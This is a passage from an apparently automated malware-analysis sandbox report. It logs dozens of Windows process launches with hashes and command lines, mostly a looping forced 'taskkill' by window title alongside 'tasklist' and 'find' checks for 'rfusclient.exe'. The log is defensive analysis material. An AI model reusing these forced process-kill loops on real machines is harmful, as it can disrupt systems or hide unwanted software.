Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x7a0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2408 Parent PID: 1032

General

Start time:	10:35:36
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0x890000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2532 Parent PID: 2948

General

Start time:	10:35:36
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf70000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 2188 Parent PID: 1032

General

Start time:	10:35:36
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0xa90000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2584 Parent PID: 2948

General

Start time:	10:35:37
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xa50000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2152 Parent PID: 2948

General

Start time:	10:35:37
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x510000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2348 Parent PID: 2948

General

Start time:	10:35:38
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x9b0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2792 Parent PID: 2948

General

Start time:	10:35:38
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x3e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3868 Parent PID: 1032

General

Start time:	10:35:38
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0x130000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2112 Parent PID: 2948

General

Start time:	10:35:39
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x890000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2884 Parent PID: 2948

General

Start time:	10:35:39
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x780000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2472 Parent PID: 2948

General

Start time:	10:35:39
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x499e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3080 Parent PID: 2948

General

Start time:	10:35:40
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3124 Parent PID: 2948

General

Start time:	10:35:40
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 776 Parent PID: 2948

General

Start time:	10:35:41
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3352 Parent PID: 2948

General

Start time:	10:35:41
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3440 Parent PID: 2948

General

Start time:	10:35:41
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3148 Parent PID: 2948

General

Start time:	10:35:42
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 1456 Parent PID: 1032

General

Start time:	10:35:42
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 1792 Parent PID: 1032

General

Start time:	10:35:42
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3420 Parent PID: 2948

General

Start time:	10:35:43
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3332 Parent PID: 2948

General

Start time:	10:35:43
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1568 Parent PID: 2948

General

Start time:	10:35:44
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3396 Parent PID: 2948

General

Start time:	10:35:44
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3544 Parent PID: 2948

General

Start time:	10:35:45
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 272 Parent PID: 1032

General

Start time:	10:35:45
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3508 Parent PID: 2948

General

Start time:	10:35:45
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3584 Parent PID: 2948

General

Start time:	10:35:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3248 Parent PID: 2948

General

Start time:	10:35:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3460 Parent PID: 2948

General

Start time:	10:35:46
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3672 Parent PID: 2948

General

Start time:	10:35:47
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1920 Parent PID: 2948

General

Start time:	10:35:47
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3464 Parent PID: 2948

General

Start time:	10:35:47
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 3776 Parent PID: 1032

General

Start time:	10:35:48
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3324 Parent PID: 2948

General

Start time:	10:35:48
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3828 Parent PID: 1032

General

Start time:	10:35:48
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2608 Parent PID: 2948

General

Start time:	10:35:49
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2516 Parent PID: 2948

General

Start time:	10:35:49
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3964 Parent PID: 2948

General

Start time:	10:35:49
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3480 Parent PID: 2948

General

Start time:	10:35:50
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3904 Parent PID: 1032

General

Start time:	10:35:50
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3116 Parent PID: 2948

General

Start time:	10:35:50
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3892 Parent PID: 2948

General

Start time:	10:35:51
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3912 Parent PID: 2948

General

Start time:	10:35:51
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1896 Parent PID: 2948

General

Start time:	10:35:52
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3860 Parent PID: 2948

General

Start time:	10:35:52
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1512 Parent PID: 2948

General

Start time:	10:35:52
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3120 Parent PID: 2948

General

Start time:	10:35:53
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xd50000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 3648 Parent PID: 1032

General

Start time:	10:35:53
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2116 Parent PID: 2948

General

Start time:	10:35:53
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 4016 Parent PID: 1032

General

Start time:	10:35:53
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2620 Parent PID: 2948

General

Start time:	10:35:54
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3568 Parent PID: 2948

General

Start time:	10:35:54
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1612 Parent PID: 2948

General

Start time:	10:35:55
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3936 Parent PID: 2948

General

Start time:	10:35:55
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2436 Parent PID: 2948

General

Start time:	10:35:56
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x499e0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 580 Parent PID: 1032

General

Start time:	10:35:56
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 292 Parent PID: 2948

General

Start time:	10:35:56
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2412 Parent PID: 2948

General

Start time:	10:35:57
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3884 Parent PID: 2948

General

Start time:	10:35:57
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3452 Parent PID: 2948

General

Start time:	10:35:58
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2332 Parent PID: 2948

General

Start time:	10:35:58
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2548 Parent PID: 1032

General

Start time:	10:35:59
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2420 Parent PID: 2948

General

Start time:	10:35:59
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 2808 Parent PID: 1032

General

Start time:	10:35:59
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2388 Parent PID: 2948

General

Start time:	10:36:00
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1228 Parent PID: 2948

General

Start time:	10:36:00
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2136 Parent PID: 2948

General

Start time:	10:36:01
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2056 Parent PID: 2948

General

Start time:	10:36:02
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3580 Parent PID: 1032

General

Start time:	10:36:02
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):
Commandline:	timeout 3 /nobreak
Imagebase:
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
